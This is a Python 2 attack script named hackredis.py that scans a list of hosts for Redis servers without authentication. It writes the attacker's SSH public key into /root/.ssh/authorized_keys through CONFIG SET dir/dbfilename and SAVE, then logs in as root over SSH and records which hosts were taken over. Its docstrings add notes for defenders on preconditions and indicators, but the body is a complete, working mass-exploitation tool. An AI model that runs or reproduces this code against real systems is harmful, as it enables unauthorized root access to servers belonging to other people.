#!/usr/bin/python
#coding:utf-8
#############################################################
## @file hackredis.py ##
## @date 2015-12-11 ##
## @author evi1cg ##
#############################################################
import redis
import argparse
import textwrap
import sys
import pexpect
try:
import paramiko
except ImportError:
print('Missing Paramiko Dependency.')
sys.exit(0)
def getargs():
    """Build the command-line parser and return the parsed arguments.

    Options defined here:
      -l   path to a file of target hosts (read line by line in main())
      -p   Redis port, default 6379
      -r   file whose first line main() stores in Redis; the help text
           calls it an id_rsa file -- presumably the public key, confirm
      -sp  SSH port, default 22
      -pk  path to the SSH private key that check() loads
    """
    parser = argparse.ArgumentParser(prog='hackredis.py', formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''\
For Example:
-----------------------------------------------------------------------------
python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22 -pk /tmp/key'''))
    parser.add_argument('-l', dest='iplist', type=str, help='the hosts of target')
    parser.add_argument('-p', dest='port', default=6379, type=int, help='the redis default port')
    parser.add_argument('-r', dest='id_rsafile', type=str, help='the ssh id_rsa file you generate')
    parser.add_argument('-sp', dest='ssh_port', type=int,default=22, help='the ssh port')
    parser.add_argument('-pk', dest='private_key', type=str, help='the ssh private key')
    # The file uses Python 2 print statements, so `/` here is integer
    # division: unless ten (or eleven) tokens follow the script name, '-h'
    # is appended and argparse prints the help text and exits. In practice
    # all five option/value pairs must be given; the defaults on -p and -sp
    # are not reachable through this check.
    if(len(sys.argv[1:]) / 2 != 5):
        sys.argv.append('-h')
    return parser.parse_args()
def hackredis(host,port,key):
    """Attempt to make an unauthenticated Redis server write root's authorized_keys.

    The function connects to host:port with no password, stores the global
    `foo` (set in main()) under the key 'crackit', points the server's dump
    directory and dump file name at /root/.ssh/authorized_keys, and issues
    SAVE. If every call returns without raising, check() is run with the
    private key path `key`; otherwise the host is logged with code 2.

    What has to be true on the server for this to succeed, and therefore
    what a defender should verify:
      * Redis accepts commands from the network without authentication
        (no `requirepass`/ACL, not bound to loopback, `protected-mode` off).
      * CONFIG is available to the client (not disabled or renamed with
        `rename-command`).
      * The redis-server process can write to /root/.ssh/, i.e. it runs as
        root rather than as a dedicated unprivileged user.
    Indicators worth alerting on: CONFIG SET of `dir` or `dbfilename` from
    a remote client, a key named 'crackit', and an authorized_keys file
    that contains binary RDB data around a key line.
    """
    ck = 0
    try:
        print "[*] Attacking ip:%s"%host
        # socket_timeout=2 bounds each Redis call to two seconds.
        r =redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2)
        # Attribute reference only (no call parentheses): nothing is sent
        # to the server by this line, so existing keys are left in place.
        r.flushall
        r.set('crackit',foo)
        # These two settings redirect where the next SAVE writes the RDB file.
        r.config_set('dir','/root/.ssh/')
        r.config_set('dbfilename','authorized_keys')
        r.save()
        ck =1
    except:
        # Bare except: connection errors, auth errors, permission errors and
        # programming errors alike are reported as a generic failure.
        print "\033[1;31;40m[-]\033[0m Something wrong with %s"%host
        write(host,2)
        ck =0
    if ck == 1:
        check(host,key)
    else:
        pass
def check(host,key):
    """Verify over SSH whether the key written by hackredis() grants root.

    Loads the RSA private key at path `key`, connects to `host` as user
    'root' with that key, runs `id`, and logs the host with code 1 when the
    output contains "root". Any exception is logged with code 3.

    Defensive relevance: the login only works if sshd permits root logins
    with public keys, so `PermitRootLogin no` in sshd_config blocks this
    step even when authorized_keys was overwritten. File-integrity
    monitoring on /root/.ssh/authorized_keys covers the write itself.
    """
    print '\033[1;33;40m[*]\033[0m Check connecting... '
    try:
        # The parameter `key` is rebound from a file path to the key object.
        key=paramiko.RSAKey.from_private_key_file(key)
        ssh=paramiko.SSHClient()
        # AutoAddPolicy accepts any unknown host key without verification.
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(hostname=host, username='root', pkey=key)
        stdin, stdout, stderr=ssh.exec_command('id')
        out = stdout.read()
        if "root" in out:
            print "\033[1;34;40m[+]\033[0m Success !"
            write(host,1)
        else:
            pass
    except:
        # Bare except: a missing key file, a refused connection and a
        # rejected key are all recorded the same way.
        print "\033[1;32;40m[-]\033[0m Failed to connect !"
        write(host,3)
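def write(host,suc):
    """Append *host* to the result file that matches status code *suc*.

    Codes used by the callers in this file:
      1 -> success.txt    (check() logged in and `id` reported root)
      2 -> fail.txt       (the Redis step in hackredis() raised)
      3 -> unconnect.txt  (the SSH step in check() raised)

    Files are opened in append mode relative to the current working
    directory, one host per line.

    Raises:
        ValueError: if *suc* is not one of the codes above. Previously an
            unknown code fell through `else: pass` and failed later with an
            unbound-variable error on the file name.
    """
    filenames = {1: 'success.txt', 2: 'fail.txt', 3: 'unconnect.txt'}
    if suc not in filenames:
        raise ValueError('unknown result code: %r' % (suc,))
    # The context manager closes the file even if the write raises.
    with open(filenames[suc], 'a') as file_object:
        file_object.write(host+'\n')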
def main():
    """Parse the arguments and run hackredis() once per line of the host file.

    Sets two module globals: `foo`, the first line of the -r file wrapped in
    three newlines on each side (the value hackredis() stores in Redis), and
    `ssh_port`, the -sp value. Exits with status 1 if the host file or the
    -r file cannot be opened.
    """
    global foo,ssh_port
    paramsargs = getargs()
    try:
        hosts = open(paramsargs.iplist,"r")
    except(IOError):
        print "Error: Check your hostfile path\n"
        sys.exit(1)
    port = paramsargs.port
    ssh_port = paramsargs.ssh_port
    key = paramsargs.private_key
    try:
        # Only the first line of the file is used.
        foo = '\n\n\n'+open(paramsargs.id_rsafile,"r").readline()+'\n\n\n'
    except(IOError):
        # The message says "wordlist", but the file that failed to open is
        # the one given with -r.
        print "Error: Check your wordlist path\n"
        sys.exit(1)
    ips = [p.replace('\n','') for p in hosts]
    # Hosts are processed sequentially; each entry is stripped of
    # surrounding whitespace before use.
    for ip in ips:
        hackredis(ip.strip(),port,key)
# Run main() only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()